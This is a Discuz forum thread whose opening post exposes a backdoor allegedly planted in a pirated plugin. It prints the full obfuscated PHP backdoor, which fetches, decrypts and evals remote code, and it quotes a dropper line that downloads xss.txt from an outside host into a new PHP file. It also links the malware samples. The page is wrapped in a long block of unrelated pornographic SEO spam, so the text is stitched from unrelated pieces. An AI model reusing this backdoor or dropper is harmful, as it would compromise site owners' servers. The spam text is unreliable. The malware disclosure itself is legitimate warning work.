久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

12下一頁
返回列表 發帖
查看: 12844|回復: 13

【續集】魔趣吧的東西真的有后門木馬,揭秘用盜版的危害

2

主題

3

回帖

5

積分

初學乍練

貢獻
0 點
金幣
0 個
樓主
發表于 2020-6-30 20:23:56 | 只看樓主 |正序瀏覽 |閱讀模式
上次寫了一篇文章 披露了盜版市場的亂象 ,沒想到本人遭到魔趣吧的站長瘋狂的報復。我自己的網站已經持續快10天魔趣吧的站長使用DDOS攻擊技術,打不開了!因為在其網站進行了手機綁定,手機也整天被短信+電話轟炸!搞的我最近經常要開飛行模式!
但是我是絕對不會像黑惡勢力低頭的,大不了我網站不做了,手機號碼不用了!

前文回顧:魔趣吧的東西好像真的有后門木馬,改了我dz的后臺密碼
http://www.9999xn.com/thread-5095-1-1.html

因為前面的那篇文章寫的比較概況,沒有列舉證據(導致其大肆誤導不明真相的群眾說我在造謠),今天我就來列舉一些證據,并對已知的后門進行深入詳細的分析!
這可能是最后一篇曝光盜版市場亂象的文章了,因為我只是一個普普通通的站長!那些江湖經驗豐富的站長我惹不起,我也見識了魔趣吧是如果把黑的說成白的!

他的理念就是只要對他有利的都是好文章,曝光他的都是在造謠他!

在正式進入主題之前,我想在說幾句題外話:先不說他有沒有干些見不得人的事,其損壞原創開發者權益,謀取自己的利益(俗稱:盜版),還有什么資格在那一副正人君子的模樣懟這個懟那個!

【下面才是今天要說的主題】
由于帶后門的資源有點多,今天我就隨便拿個在魔趣吧收費的資源,且我之前安裝過,受害的資源來做分析!

樣本下載鏈接:為了不給他打廣告,帖子ID: 9183 ,知道他網站的隨便打開一個帖子把id換成這個就可以定位到!

因為是VIP資源,所以我分享到了藍奏網盤:https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止因為我的曝光,他會修改附件,然后狡辯!對本文有異議的朋友可以在本文發布不久的時候,前去下載對比MD5值后,并效驗是不是存在本文提到的后門木馬!

樣本插件名稱:積分提現中心 V1.2

木馬文件所在路徑:keke_tixian\function\function_core.php


木馬完整代碼:
  1. <?php
  2. function zm_diconv($str){
  3.   $encode = mb_detect_encoding($str, array(

  4.         "ASCII",

  5.         "UTF-8",

  6.         "GB2312",

  7.         "GBK",

  8.         "BIG5"

  9.     ));

  10.     if ($encode != CHARSET) {

  11.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);

  12.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);

  13.     }

  14.     if (!$keytitle) {

  15.         $keytitle = $str;

  16.     }

  17.     return $keytitle;

  18. }
  19. function caidi($oo){
  20.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
  21.         $forver=stripos($love,'d');
  22.         $forvere=stripos($love,'z');
  23.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
  24.         $forveres='DECODE';
  25.         $aini=substr($love,$forver,$forvere);//獲取方法函數名decrypt
  26.         $aini=$oo?$forveres:$aini;
  27.         return $aini;
  28. }
  29. function decrypt($data, $key = '721520') {
  30.                 global $_G;
  31.                 $key = $key ? $key : $_G['config']['security']['authkey'];
  32.                 $type = caidi($key);
  33.                 return authcode($data,$type, $key);
  34.                 }

  35. function contentz($svip) {
  36. if(function_exists('file_get_contents')) {
  37. $data = file_get_contents($svip);
  38. } else {
  39. $ch = curl_init();
  40. $timeout = 5;
  41. curl_setopt ($ch, CURLOPT_URL, $svip);
  42. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  43. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  44. $data = curl_exec($ch);
  45. curl_close($ch);
  46. }
  47. return $data;
  48. }
  49. $iloveyou = caidi($oo);
  50. eval($iloveyou(strip_tags(contentz($love))));
  51. ?>
復制代碼
關鍵代碼:
  1. $iloveyou = caidi($oo);
  2. eval($iloveyou(strip_tags(contentz($love))));
復制代碼


有了這些信息 我們下面進行分析(在這里大膽的猜測一下:文件完全是魔趣吧自己加進去的,正版可能就沒有這個文件,因為這個文件代碼全是和后門有關!和插件自身功能沒有關系)
在關鍵代碼前面的都是木馬偽裝所需要用到的函數 執行過程如下:
1/----------------------

后門腳本執行入口:keke_tixian\admin.inc.php
關鍵代碼在該文件第7行:引用后門文件并執行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋:只要安裝插件一打開后臺的插件設置,木馬就自動執行了!

2/--------依次執行----------


$iloveyou = caidi($oo);
解釋:定義一個名為   iloveyou 的變量  ,值為: caidi($oo)
調試: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值等于:decrypt
備注:函數 caidi 定義并賦值了 $love  作全局變量, love 的值等于:htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋:已知 iloveyou 的值等于:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數 contentz 得知該函數 是訪問遠程鏈接并返回內容,相當于 curl
分析函數 decrypt 得知該函數 是進行內容解密,直接調用了DISCUZ自帶的解密函數 authcode


解釋的解釋:代碼 eval($iloveyou(strip_tags(contentz($love)))); ,經過層層分析,最終為:
執行腳本 ( 解密 ( 訪問遠程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執行----------

htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現在訪問返回的全部是 1111111111111111,所以無法繼續分析遠程的代碼是什么!

可能魔趣吧站長已經知道我接下來會深入曝光他。所以暫時把遠程代碼先全部改成了 1111111111111111
即使是這樣!又如何? 執行遠程腳本 有什么危害?相信做網站的都知道!這里我不進行科普!感興趣的站長可以百度自行科普:例:一句話木馬,菜刀!
下面的代碼是我網站自動多出來的一個文件:因為無法繼續分析,直接看結果
  1. <?php
  2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));
復制代碼
上面的xss.txt  防止 魔趣吧站長 再去取消 我上傳到了 藍奏網盤 https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問底--------

在前面一篇文章中提到過了  魔趣吧站長聲稱該木馬是源碼哥的!
但是既然干了,就干到底!
百度了一下 搜索 到 源碼哥  ,在他網站搜索 了一下 積分提現中心  果然找到一個一模一樣的版本!
花了20塊錢下載下來(真黑啊,1.2  這么舊的版本還賣20),不過花20塊錢 能讓大家看清,防止中木馬。也值得!

結局打臉: 沒有 keke_tixian\function\function_core.php  這個文件,因為是邊寫邊弄的,既然寫好了就這樣吧!
雖然沒有發現木馬,但是應該也是一丘之貉,還是呼吁大家不要用盜版!不要用盜版!不要用盜版!

PS:對魔趣吧站長傳播木馬,DDOS我的網站,短信+電話轟炸我的手機號 表示非常的鄙視!


希望官方管理員能夠曝光這篇文章,讓更多準備用盜版的站長、已經在用盜版的站長。趕緊回頭是岸!
樣本已經上傳到藍奏網盤,文章寫的不到位的地方,歡迎各路大神補充!



回復

使用道具 舉報

6

主題

35

回帖

48

積分

初學乍練

貢獻
0 點
金幣
6 個
14#
發表于 2022-12-24 13:09:35 | 只看Ta
加木馬后發布 還賣錢,果然厲害。真的要支持正版
回復

使用道具 舉報

0

主題

25

回帖

31

積分

初學乍練

貢獻
0 點
金幣
5 個
13#
發表于 2022-11-28 23:36:31 | 只看Ta
羅永浩 發表于 2020-7-1 02:59
幾百塊一個月上高防就行。

高防能防后門?還是第一次聽說 。。。度娘下高防是防什么滴兄弟  。。。
回復

使用道具 舉報

0

主題

25

回帖

31

積分

初學乍練

貢獻
0 點
金幣
5 個
12#
發表于 2022-11-2 23:32:22 | 只看Ta
他有搞了一個侵權投訴   。我剛搜了一下 。他的站 基本都是盜版模板 插件 。還弄一個 侵權投訴  。難道是現在板的   掩耳盜鈴  。。。。可笑至極  。。。官方也該收拾下這些盜版的了 。本來現在PC端  都要死不活的了 。都沒動力做下去了。 我一個朋友以前先做DZ開發的 。現在沒做了 。辛苦寫出的東東 。還沒賣幾個 。淘寶上都出現一堆盜版了 10元打包一堆 。。。付出和收入都不對等     。。。那里還有動力 來玩這個啊
回復 1

使用道具 舉報

0

主題

7

回帖

25

積分

初學乍練

貢獻
0 點
金幣
17 個
11#
發表于 2020-7-2 03:07:56 | 只看Ta
貪小便宜的弊端。我也是曾經犯錯類似的問題
回復

使用道具 舉報

70

主題

106

回帖

279

積分

版主

貢獻
4 點
金幣
32 個
10#
發表于 2020-7-1 23:54:27 | 只看Ta
這故事引起了我的注意
回復

使用道具 舉報

28

主題

284

回帖

387

積分

爐火純青

貢獻
5 點
金幣
35 個
QQ
9#
發表于 2020-7-1 20:56:10 | 只看Ta
嗯,當我看見你那個帖子的時候,發現一個叫做魔趣吧的用戶回復了你但被discuz管理員屏蔽了我就知道事情不簡單。我不站樓主和魔趣吧,我站discuz管理員的做法(放肆的大笑)
回復 1

使用道具 舉報

21

主題

500

回帖

1057

積分

應用開發者

貢獻
29 點
金幣
193 個
QQ
8#
發表于 2020-7-1 11:16:13 | 只看Ta
羅永浩 發表于 2020-7-1 02:59
幾百塊一個月上高防就行。

能舍得幾百塊一個月高防用盜版,何不花百十塊買個正版使用,不香嗎?
回復

使用道具 舉報

22

主題

829

回帖

1133

積分

已臻大成

貢獻
27 點
金幣
80 個
7#
發表于 2020-7-1 02:59:19 | 只看Ta
幾百塊一個月上高防就行。
回復

使用道具 舉報

0

主題

7

回帖

25

積分

初學乍練

貢獻
0 點
金幣
17 個
6#
發表于 2020-6-30 23:46:45 | 只看Ta
魔趣我不知道 反正哪個源碼哥的肯定是有木馬。都自己修改內容
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

  • 關注公眾號
  • 有償服務微信
  • 有償服務QQ

手機版|小黑屋|Discuz! 官方交流社區 ( 皖ICP備16010102號 |皖公網安備34010302002376號 )|網站地圖|star

GMT+8, 2025-11-18 10:18 , Processed in 0.058663 second(s), 13 queries , Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2025 Discuz! Team.

關燈 在本版發帖
有償服務QQ
有償服務微信
返回頂部
快速回復 返回頂部 返回列表
久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线
国产在线精品国自产拍免费| 精品1区2区在线观看| 极品少妇xxxx精品少妇| 久久在线精品| 亚洲国产va精品久久久不卡综合| 亚洲人成久久| 亚洲精品成人天堂一二三| 红桃视频国产一区| 亚洲视频1区2区| 国产视频久久| 日韩中文字幕91| 久久av一区| 久热成人在线视频| 欧美一卡2卡三卡4卡5免费| 成人午夜伦理影院| 国产亚洲欧美一区在线观看| 欧美精品97| 中文字幕在线免费不卡| 国产午夜精品在线| 人妖欧美一区二区| 6080午夜不卡| 9人人澡人人爽人人精品| 国产欧美日韩另类视频免费观看| 欧美性色综合| 亚洲视频 欧洲视频| 噜噜噜91成人网| 青娱乐精品视频| 91精品国产91久久久久久一区二区| 成人精品鲁一区一区二区| 国产亚洲短视频| 亚洲激情影院| 日本麻豆一区二区三区视频| 欧美二区在线观看| 成人黄色综合网站| 国产精品久久久久一区二区三区| 国产一区二区高清| 久久成人免费网站| 日韩欧美久久久| 国产精品v欧美精品v日本精品动漫 | 国产.精品.日韩.另类.中文.在线.播放| 日韩限制级电影在线观看| 欧美一区免费视频| 亚洲综合另类小说| 欧美精品久久天天躁| 欧美1区2区视频| 一区二区激情视频| 欧美日韩综合色| 女生裸体视频一区二区三区| 一区二区三区鲁丝不卡| 欧美三级电影在线看| 不卡av免费在线观看| 亚洲美女屁股眼交3| 欧美日韩一区二区三区免费看| 99re这里只有精品6| 亚洲欧美偷拍卡通变态| 在线观看欧美日本| 99热精品国产| 亚洲国产精品欧美一二99| 欧美片网站yy| 国产精品红桃| 美女网站视频久久| 久久亚洲欧美国产精品乐播 | 日本欧美加勒比视频| 精品国产成人在线影院| 国产精品欧美久久| 国产黄色91视频| 综合网在线视频| 欧美日韩电影在线播放| 国产精品v欧美精品v日韩| 乱中年女人伦av一区二区| 中文字幕 久热精品 视频在线| 欧洲色大大久久| 欧美日韩亚洲三区| 美国毛片一区二区三区| 中文字幕精品综合| 欧美色图免费看| 激情久久婷婷| 国产最新精品精品你懂的| 亚洲色图制服诱惑| 欧美一二三四在线| 国产精品入口| 波多野结衣亚洲| 日韩高清在线不卡| 中文字幕av一区二区三区高| 欧美日韩在线直播| 亚洲精品国产日韩| 国产999精品久久久久久绿帽| 亚洲一区自拍偷拍| 久久久精品国产免费观看同学| 91久久免费观看| 雨宫琴音一区二区在线| 国内外成人在线| 亚洲精品中文字幕乱码三区 | 欧美国产乱子伦| 欧美精品在欧美一区二区少妇| 亚洲精品一区二区三| 成人在线一区二区三区| 午夜亚洲福利老司机| 欧美激情一区在线观看| 欧美日韩视频一区二区| 国产精品乱码一区二区三区| 91免费视频网| 国产精品一品二品| 日韩va欧美va亚洲va久久| 亚洲婷婷国产精品电影人久久| 日韩一级片在线播放| 久久久水蜜桃| 亚洲一二三区精品| 99免费精品视频| 国产美女精品一区二区三区| 午夜一区二区三区视频| 国产精品毛片无遮挡高清| 日韩欧美国产三级电影视频| 久久一区欧美| 国产精品日韩| 欧美日韩天天操| 成人高清在线视频| 激情图区综合网| 日精品一区二区| 亚洲一区二区三区爽爽爽爽爽 | 色综合久久天天| 一区二区三区你懂的| 国产综合激情| 91香蕉视频mp4| 国产成人精品在线看| 久久66热re国产| 日本不卡一区二区三区| 一区二区免费在线播放| 中文字幕一区视频| 中文字幕欧美三区| 久久久久青草大香线综合精品| 欧美一区午夜精品| 在线观看91视频| 色菇凉天天综合网| 久久亚洲二区| 免费日韩视频| 亚洲一区二区毛片| 国产婷婷精品| 国产亚洲一级| 国产日韩免费| 国产精品三上| 国产精品午夜av在线| 一区二区日韩免费看| 国产欧美高清| 136国产福利精品导航网址| 欧美区国产区| 女同性一区二区三区人了人一| 成人午夜看片网址| 成人免费视频一区二区| 国产91在线|亚洲| 国产精品一区不卡| 国产成人精品午夜视频免费| 国产成人精品影院| 成a人片亚洲日本久久| 成人va在线观看| 成人精品视频一区二区三区尤物| 国产成人综合亚洲网站| 国产成人精品免费网站| 大白屁股一区二区视频| 国产99精品在线观看| 成人综合婷婷国产精品久久免费| 国产成人精品亚洲日本在线桃色| 国产成人综合网| 99久久综合99久久综合网站| 91蝌蚪porny| 欧美国产91| 亚洲成色精品| 国产亚洲一区二区三区在线播放| 亚洲在线成人| 色综合久久六月婷婷中文字幕| 在线观看亚洲精品视频| 欧美日韩一级二级| 日韩一级免费观看| 亚洲精品在线免费观看视频| 国产三级一区二区三区| 国产精品毛片久久久久久| 亚洲精品日韩综合观看成人91| 亚洲一区二区在线观看视频| 日本在线不卡视频一二三区| 寂寞少妇一区二区三区| 成人视屏免费看| 国产精品v欧美精品v日本精品动漫 | 欧美区高清在线| 亚洲精品影院| 一本一道综合狠狠老| 欧美群妇大交群中文字幕| 日韩久久久精品| 中文欧美字幕免费| 一区二区三区小说| 日本免费新一区视频| 国产精品综合在线视频| av福利精品导航| 精品成人国产| 久久成人免费| 欧美人狂配大交3d怪物一区| 欧美大黄免费观看| 欧美经典一区二区| 亚洲一区二区三区四区在线观看 | 在线日韩av| 欧洲另类一二三四区|